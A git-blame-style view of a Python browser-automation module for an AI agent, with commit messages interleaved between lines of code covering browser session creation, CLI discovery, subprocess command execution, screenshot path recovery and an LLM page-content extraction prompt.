This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
session_name = f " h_ { uuid . uuid4 ( ) . hex [ : 10 ] } "
logger . info ( " Created local browser session %s for task %s " ,
session_name , task_id )
2026-03-07 01:14:57 -08:00
return {
" session_name " : session_name ,
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
" bb_session_id " : None ,
" cdp_url " : None ,
2026-03-07 01:14:57 -08:00
" features " : { " local " : True } ,
}
2026-03-16 06:38:20 -07:00
def _create_cdp_session ( task_id : str , cdp_url : str ) - > Dict [ str , str ] :
""" Create a session that connects to a user-supplied CDP endpoint. """
import uuid
session_name = f " cdp_ { uuid . uuid4 ( ) . hex [ : 10 ] } "
logger . info ( " Created CDP browser session %s → %s for task %s " ,
session_name , cdp_url , task_id )
return {
" session_name " : session_name ,
" bb_session_id " : None ,
" cdp_url " : cdp_url ,
" features " : { " cdp_override " : True } ,
}
2026-01-29 06:10:24 +00:00
def _get_session_info ( task_id : Optional [ str ] = None ) - > Dict [ str , str ] :
"""
Get or create session info for the given task .
2026-03-14 11:34:31 -07:00
2026-03-07 01:14:57 -08:00
In cloud mode , creates a Browserbase session with proxies enabled .
In local mode , generates a session name for agent - browser - - session .
2026-01-31 21:42:15 -08:00
Also starts the inactivity cleanup thread and updates activity tracking .
2026-02-21 00:44:25 -08:00
Thread - safe : multiple subagents can call this concurrently .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Unique identifier for the task
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
2026-03-07 01:14:57 -08:00
Dict with session_name ( always ) , bb_session_id + cdp_url ( cloud only )
2026-01-29 06:10:24 +00:00
"""
if task_id is None :
task_id = " default "
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
# Start the cleanup thread if not running (handles inactivity timeouts)
_start_browser_cleanup_thread ( )
2026-03-14 11:34:31 -07:00
2026-01-31 21:42:15 -08:00
# Update activity timestamp for this session
_update_session_activity ( task_id )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
with _cleanup_lock :
# Check if we already have a session for this task
if task_id in _active_sessions :
return _active_sessions [ task_id ]
2026-03-14 11:34:31 -07:00
2026-03-07 01:14:57 -08:00
# Create session outside the lock (network call in cloud mode)
2026-03-16 06:38:20 -07:00
cdp_override = _get_cdp_override ( )
if cdp_override :
session_info = _create_cdp_session ( task_id , cdp_override )
2026-03-07 01:14:57 -08:00
else :
2026-03-17 00:16:34 -07:00
provider = _get_cloud_provider ( )
if provider is None :
session_info = _create_local_session ( task_id )
else :
session_info = provider . create_session ( task_id )
feat: switch managed browser provider from Browserbase to Browser Use (#5750)
* feat: switch managed browser provider from Browserbase to Browser Use
The Nous subscription tool gateway now routes browser automation through
Browser Use instead of Browserbase. This commit:
- Adds managed Nous gateway support to BrowserUseProvider (idempotency
keys, X-BB-API-Key auth header, external_call_id persistence)
- Removes managed gateway support from BrowserbaseProvider (now
direct-only via BROWSERBASE_API_KEY/BROWSERBASE_PROJECT_ID)
- Updates browser_tool.py fallback: prefers Browser Use over Browserbase
- Updates nous_subscription.py: gateway vendor 'browser-use', auto-config
sets cloud_provider='browser-use' for new subscribers
- Updates tools_config.py: Nous Subscription entry now uses Browser Use
- Updates setup.py, cli.py, status.py, prompt_builder.py display strings
- Updates all affected tests to match new behavior
Browserbase remains fully functional for users with direct API credentials.
The change only affects the managed/subscription path.
* chore: remove redundant Browser Use hint from system prompt
* fix: upgrade Browser Use provider to v3 API
- Base URL: api/v2 -> api/v3 (v2 is legacy)
- Unified all endpoints to use native Browser Use paths:
- POST /browsers (create session, returns cdpUrl)
- PATCH /browsers/{id} with {action: stop} (close session)
- Removed managed-mode branching that used Browserbase-style
/v1/sessions paths — v3 gateway now supports /browsers directly
- Removed unused managed_mode variable in close_session
* fix(browser-use): use X-Browser-Use-API-Key header for managed mode
The managed gateway expects X-Browser-Use-API-Key, not X-BB-API-Key
(which is a Browserbase-specific header). Using the wrong header caused
a 401 AUTH_ERROR on every managed-mode browser session create.
Simplified _headers() to always use X-Browser-Use-API-Key regardless
of direct vs managed mode.
* fix(nous_subscription): browserbase explicit provider is direct-only
Since managed Nous gateway now routes through Browser Use, the
browserbase explicit provider path should not check managed_browser_available
(which resolves against the browser-use gateway). Simplified to direct-only
with managed=False.
* fix(browser-use): port missing improvements from PR #5605
- CDP URL normalization: resolve HTTP discovery URLs to websocket after
cloud provider create_session() (prevents agent-browser failures)
- Managed session payload: send timeout=5 and proxyCountryCode=us for
gateway-backed sessions (prevents billing overruns)
- Update prompt builder, browser_close schema, and module docstring to
replace remaining Browserbase references with Browser Use
- Dynamic /browser status detection via _get_cloud_provider() instead
of hardcoded env var checks (future-proof for new providers)
- Rename post_setup key from 'browserbase' to 'agent_browser'
- Update setup hint to mention Browser Use alongside Browserbase
- Add tests: CDP normalization, browserbase direct-only guard,
managed browser-use gateway, direct browserbase fallback
---------
Co-authored-by: rob-maron <132852777+rob-maron@users.noreply.github.com>
2026-04-07 22:40:22 +10:00
if session_info . get ( " cdp_url " ) :
# Some cloud providers (including Browser-Use v3) return an HTTP
# CDP discovery URL instead of a raw websocket endpoint.
session_info = dict ( session_info )
session_info [ " cdp_url " ] = _resolve_cdp_override ( str ( session_info [ " cdp_url " ] ) )
2026-03-14 11:34:31 -07:00
2026-02-21 00:44:25 -08:00
with _cleanup_lock :
2026-03-17 04:09:16 -07:00
# Double-check: another thread may have created a session while we
# were doing the network call. Use the existing one to avoid leaking
# orphan cloud sessions.
if task_id in _active_sessions :
return _active_sessions [ task_id ]
2026-02-21 00:44:25 -08:00
_active_sessions [ task_id ] = session_info
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return session_info
def _find_agent_browser ( ) - > str :
"""
Find the agent - browser CLI executable .
2026-03-14 11:34:31 -07:00
2026-03-23 22:45:55 -07:00
Checks in order : current PATH , Homebrew / common bin dirs , Hermes - managed
node , local node_modules / . bin / , npx fallback .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Path to agent - browser executable
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Raises :
FileNotFoundError : If agent - browser is not installed
"""
2026-02-20 23:40:42 -08:00
2026-02-09 04:35:25 +00:00
# Check if it's in PATH (global install)
2026-01-29 06:10:24 +00:00
which_result = shutil . which ( " agent-browser " )
if which_result :
return which_result
2026-03-23 22:45:55 -07:00
# Build an extended search PATH including Homebrew and Hermes-managed dirs.
# This covers macOS where the process PATH may not include Homebrew paths.
extra_dirs : list [ str ] = [ ]
for d in [ " /opt/homebrew/bin " , " /usr/local/bin " ] :
if os . path . isdir ( d ) :
extra_dirs . append ( d )
extra_dirs . extend ( _discover_homebrew_node_dirs ( ) )
2026-04-03 21:50:59 +03:00
hermes_home = get_hermes_home ( )
2026-03-23 22:45:55 -07:00
hermes_node_bin = str ( hermes_home / " node " / " bin " )
if os . path . isdir ( hermes_node_bin ) :
extra_dirs . append ( hermes_node_bin )
if extra_dirs :
extended_path = os . pathsep . join ( extra_dirs )
which_result = shutil . which ( " agent-browser " , path = extended_path )
if which_result :
return which_result
2026-02-09 04:35:25 +00:00
# Check local node_modules/.bin/ (npm install in repo root)
repo_root = Path ( __file__ ) . parent . parent
local_bin = repo_root / " node_modules " / " .bin " / " agent-browser "
if local_bin . exists ( ) :
return str ( local_bin )
2026-03-14 11:34:31 -07:00
2026-03-23 22:45:55 -07:00
# Check common npx locations (also search extended dirs)
2026-01-29 06:10:24 +00:00
npx_path = shutil . which ( " npx " )
2026-03-23 22:45:55 -07:00
if not npx_path and extra_dirs :
npx_path = shutil . which ( " npx " , path = os . pathsep . join ( extra_dirs ) )
2026-01-29 06:10:24 +00:00
if npx_path :
return " npx agent-browser "
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
raise FileNotFoundError (
" agent-browser CLI not found. Install it with: npm install -g agent-browser \n "
2026-02-09 04:35:25 +00:00
" Or run ' npm install ' in the repo root to install locally. \n "
2026-01-29 06:10:24 +00:00
" Or ensure npx is available in your PATH. "
)
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
def _extract_screenshot_path_from_text ( text : str ) - > Optional [ str ] :
""" Extract a screenshot file path from agent-browser human-readable output. """
if not text :
return None
patterns = [
r " Screenshot saved to [ ' \" ](?P<path>/[^ ' \" ]+? \ .png)[ ' \" ] " ,
r " Screenshot saved to (?P<path>/ \ S+? \ .png)(?: \ s|$) " ,
r " (?P<path>/ \ S+? \ .png)(?: \ s|$) " ,
]
for pattern in patterns :
match = re . search ( pattern , text )
if match :
path = match . group ( " path " ) . strip ( ) . strip ( " ' \" " )
if path :
return path
return None
2026-01-29 06:10:24 +00:00
def _run_browser_command (
task_id : str ,
command : str ,
args : List [ str ] = None ,
2026-03-24 07:21:50 -07:00
timeout : Optional [ int ] = None ,
2026-01-29 06:10:24 +00:00
) - > Dict [ str , Any ] :
"""
Run an agent - browser CLI command using our pre - created Browserbase session .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Args :
task_id : Task identifier to get the right session
command : The command to run ( e . g . , " open " , " click " )
args : Additional arguments for the command
2026-03-24 07:21:50 -07:00
timeout : Command timeout in seconds . ` ` None ` ` reads
` ` browser . command_timeout ` ` from config ( default 30 s ) .
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
Returns :
Parsed JSON response from agent - browser
"""
2026-03-24 07:21:50 -07:00
if timeout is None :
timeout = _get_command_timeout ( )
2026-01-29 06:10:24 +00:00
args = args or [ ]
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Build the command
try :
browser_cmd = _find_agent_browser ( )
except FileNotFoundError as e :
2026-03-08 19:54:32 -07:00
logger . warning ( " agent-browser CLI not found: %s " , e )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : str ( e ) }
2026-03-14 11:34:31 -07:00
2026-02-23 02:11:33 -08:00
from tools . interrupt import is_interrupted
if is_interrupted ( ) :
return { " success " : False , " error " : " Interrupted " }
2026-01-29 06:10:24 +00:00
# Get session info (creates Browserbase session with proxies if needed)
try :
session_info = _get_session_info ( task_id )
except Exception as e :
2026-03-14 11:34:31 -07:00
logger . warning ( " Failed to create browser session for task= %s : %s " , task_id , e )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : f " Failed to create browser session: { str ( e ) } " }
2026-03-14 11:34:31 -07:00
2026-03-07 01:14:57 -08:00
# Build the command with the appropriate backend flag.
# Cloud mode: --cdp <websocket_url> connects to Browserbase.
# Local mode: --session <name> launches a local headless Chromium.
# The rest of the command (--json, command, args) is identical.
if session_info . get ( " cdp_url " ) :
# Cloud mode — connect to remote Browserbase browser via CDP
# IMPORTANT: Do NOT use --session with --cdp. In agent-browser >=0.13,
# --session creates a local browser instance and silently ignores --cdp.
backend_args = [ " --cdp " , session_info [ " cdp_url " ] ]
else :
# Local mode — launch a headless Chromium instance
backend_args = [ " --session " , session_info [ " session_name " ] ]
cmd_parts = browser_cmd . split ( ) + backend_args + [
2026-02-21 00:54:01 -08:00
" --json " ,
2026-01-29 06:10:24 +00:00
command
] + args
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
try :
2026-02-09 04:35:25 +00:00
# Give each task its own socket directory to prevent concurrency conflicts.
# Without this, parallel workers fight over the same default socket path,
# causing "Failed to create socket directory: Permission denied" errors.
task_socket_dir = os . path . join (
2026-03-08 19:31:23 -07:00
_socket_safe_tmpdir ( ) ,
2026-02-09 04:35:25 +00:00
f " agent-browser- { session_info [ ' session_name ' ] } "
)
2026-03-08 19:31:23 -07:00
os . makedirs ( task_socket_dir , mode = 0o700 , exist_ok = True )
2026-03-08 19:54:32 -07:00
logger . debug ( " browser cmd= %s task= %s socket_dir= %s ( %d chars) " ,
command , task_id , task_socket_dir , len ( task_socket_dir ) )
2026-03-14 11:34:31 -07:00
2026-03-08 04:08:41 -07:00
browser_env = { * * os . environ }
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
2026-03-23 22:45:55 -07:00
# Ensure PATH includes Hermes-managed Node first, Homebrew versioned
# node dirs (for macOS ``brew install node@24``), then standard system dirs.
2026-04-03 12:32:10 -07:00
hermes_home = get_hermes_home ( )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
hermes_node_bin = str ( hermes_home / " node " / " bin " )
existing_path = browser_env . get ( " PATH " , " " )
path_parts = [ p for p in existing_path . split ( " : " ) if p ]
2026-03-23 22:45:55 -07:00
candidate_dirs = (
[ hermes_node_bin ]
+ _discover_homebrew_node_dirs ( )
+ [ p for p in _SANE_PATH . split ( " : " ) if p ]
)
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
for part in reversed ( candidate_dirs ) :
if os . path . isdir ( part ) and part not in path_parts :
path_parts . insert ( 0 , part )
browser_env [ " PATH " ] = " : " . join ( path_parts )
2026-03-08 04:08:41 -07:00
browser_env [ " AGENT_BROWSER_SOCKET_DIR " ] = task_socket_dir
2026-03-14 11:34:31 -07:00
2026-03-17 00:16:34 -07:00
# Use temp files for stdout/stderr instead of pipes.
# agent-browser starts a background daemon that inherits file
# descriptors. With capture_output=True (pipes), the daemon keeps
# the pipe fds open after the CLI exits, so communicate() never
# sees EOF and blocks until the timeout fires.
stdout_path = os . path . join ( task_socket_dir , f " _stdout_ { command } " )
stderr_path = os . path . join ( task_socket_dir , f " _stderr_ { command } " )
stdout_fd = os . open ( stdout_path , os . O_WRONLY | os . O_CREAT | os . O_TRUNC , 0o600 )
stderr_fd = os . open ( stderr_path , os . O_WRONLY | os . O_CREAT | os . O_TRUNC , 0o600 )
try :
proc = subprocess . Popen (
cmd_parts ,
stdout = stdout_fd ,
stderr = stderr_fd ,
stdin = subprocess . DEVNULL ,
env = browser_env ,
)
finally :
os . close ( stdout_fd )
os . close ( stderr_fd )
try :
proc . wait ( timeout = timeout )
except subprocess . TimeoutExpired :
proc . kill ( )
proc . wait ( )
logger . warning ( " browser ' %s ' timed out after %d s (task= %s , socket_dir= %s ) " ,
command , timeout , task_id , task_socket_dir )
return { " success " : False , " error " : f " Command timed out after { timeout } seconds " }
with open ( stdout_path , " r " ) as f :
stdout = f . read ( )
with open ( stderr_path , " r " ) as f :
stderr = f . read ( )
returncode = proc . returncode
# Clean up temp files (best-effort)
for p in ( stdout_path , stderr_path ) :
try :
os . unlink ( p )
except OSError :
pass
2026-03-08 04:08:41 -07:00
# Log stderr for diagnostics — use warning level on failure so it's visible
2026-03-17 00:16:34 -07:00
if stderr and stderr . strip ( ) :
level = logging . WARNING if returncode != 0 else logging . DEBUG
logger . log ( level , " browser ' %s ' stderr: %s " , command , stderr . strip ( ) [ : 500 ] )
2026-03-14 11:34:31 -07:00
2026-03-08 04:36:23 -07:00
# Log empty output as warning — common sign of broken agent-browser
2026-03-17 00:16:34 -07:00
if not stdout . strip ( ) and returncode == 0 :
2026-03-08 04:36:23 -07:00
logger . warning ( " browser ' %s ' returned empty stdout with rc=0. "
" cmd= %s stderr= %s " ,
command , " " . join ( cmd_parts [ : 4 ] ) + " ... " ,
2026-03-17 00:16:34 -07:00
( stderr or " " ) [ : 200 ] )
2026-03-08 04:36:23 -07:00
2026-03-17 00:16:34 -07:00
stdout_text = stdout . strip ( )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if stdout_text :
2026-01-29 06:10:24 +00:00
try :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
parsed = json . loads ( stdout_text )
2026-03-14 11:34:31 -07:00
# Warn if snapshot came back empty (common sign of daemon/CDP issues)
2026-02-21 00:27:35 -08:00
if command == " snapshot " and parsed . get ( " success " ) :
snap_data = parsed . get ( " data " , { } )
if not snap_data . get ( " snapshot " ) and not snap_data . get ( " refs " ) :
2026-02-21 03:11:11 -08:00
logger . warning ( " snapshot returned empty content. "
" Possible stale daemon or CDP connection issue. "
2026-03-17 00:16:34 -07:00
" returncode= %s " , returncode )
2026-02-21 00:27:35 -08:00
return parsed
2026-01-29 06:10:24 +00:00
except json . JSONDecodeError :
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
raw = stdout_text [ : 2000 ]
2026-03-08 19:54:32 -07:00
logger . warning ( " browser ' %s ' returned non-JSON output (rc= %s ): %s " ,
2026-03-17 00:16:34 -07:00
command , returncode , raw [ : 500 ] )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if command == " screenshot " :
2026-03-17 00:16:34 -07:00
stderr_text = ( stderr or " " ) . strip ( )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
combined_text = " \n " . join (
part for part in [ stdout_text , stderr_text ] if part
)
2026-03-14 11:34:31 -07:00
recovered_path = _extract_screenshot_path_from_text ( combined_text )
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
if recovered_path and Path ( recovered_path ) . exists ( ) :
logger . info (
" browser ' screenshot ' recovered file from non-JSON output: %s " ,
recovered_path ,
)
return {
" success " : True ,
" data " : {
" path " : recovered_path ,
" raw " : raw ,
} ,
}
2026-01-29 06:10:24 +00:00
return {
Fix browser cleanup consistency and screenshot recovery
Unify browser session teardown so manual close, inactivity cleanup, and emergency shutdown all follow the same cleanup path instead of partially duplicating logic.
This changes browser_close() to delegate to cleanup_browser(), which means recording shutdown, Browserbase release, activity bookkeeping cleanup, and local socket-directory removal now happen consistently. It also updates emergency cleanup to route through cleanup_all_browsers() and explicitly clear in-memory tracking state after teardown so stale active-session, last-activity, and recording entries are not left behind on exit.
The screenshot fallback path has also been fixed. _extract_screenshot_path_from_text() now matches real absolute PNG paths, including quoted output, so browser_vision() can recover screenshots when agent-browser emits human-readable text instead of JSON.
Regression coverage was added in tests/tools/test_browser_cleanup.py for screenshot path extraction, cleanup_browser() state removal, browser_close() delegation, and emergency cleanup state clearing.
Verified with:
- python -m pytest tests/tools/test_browser_cleanup.py -q
- python -m pytest tests/tools/test_browser_console.py tests/gateway/test_send_image_file.py -q
2026-03-12 02:49:24 +01:00
" success " : False ,
" error " : f " Non-JSON output from agent-browser for ' { command } ' : { raw } "
2026-01-29 06:10:24 +00:00
}
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
# Check for errors
2026-03-17 00:16:34 -07:00
if returncode != 0 :
error_msg = stderr . strip ( ) if stderr else f " Command failed with code { returncode } "
logger . warning ( " browser ' %s ' failed (rc= %s ): %s " , command , returncode , error_msg [ : 300 ] )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : error_msg }
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
return { " success " : True , " data " : { } }
2026-03-14 11:34:31 -07:00
2026-01-29 06:10:24 +00:00
except Exception as e :
2026-03-08 19:54:32 -07:00
logger . warning ( " browser ' %s ' exception: %s " , command , e , exc_info = True )
2026-01-29 06:10:24 +00:00
return { " success " : False , " error " : str ( e ) }
2026-02-22 02:16:11 -08:00
def _extract_relevant_content (
2026-01-29 06:10:24 +00:00
snapshot_text : str ,
user_task : Optional [ str ] = None
) - > str :
2026-02-22 02:16:11 -08:00
""" Use LLM to extract relevant content from a snapshot based on the user ' s task.
2026-03-07 08:52:06 -08:00
Falls back to simple truncation when no auxiliary text model is configured .
2026-01-29 06:10:24 +00:00
"""
2026-02-22 02:16:11 -08:00
if user_task :
extraction_prompt = (
f " You are a content extractor for a browser automation agent. \n \n "
f " The user ' s task is: { user_task } \n \n "
f " Given the following page snapshot (accessibility tree representation), "
f " extract and summarize the most relevant information for completing this task. Focus on: \n "
f " 1. Interactive elements (buttons, links, inputs) that might be needed \n "
f " 2. Text content relevant to the task (prices, descriptions, headings, important info) \n "
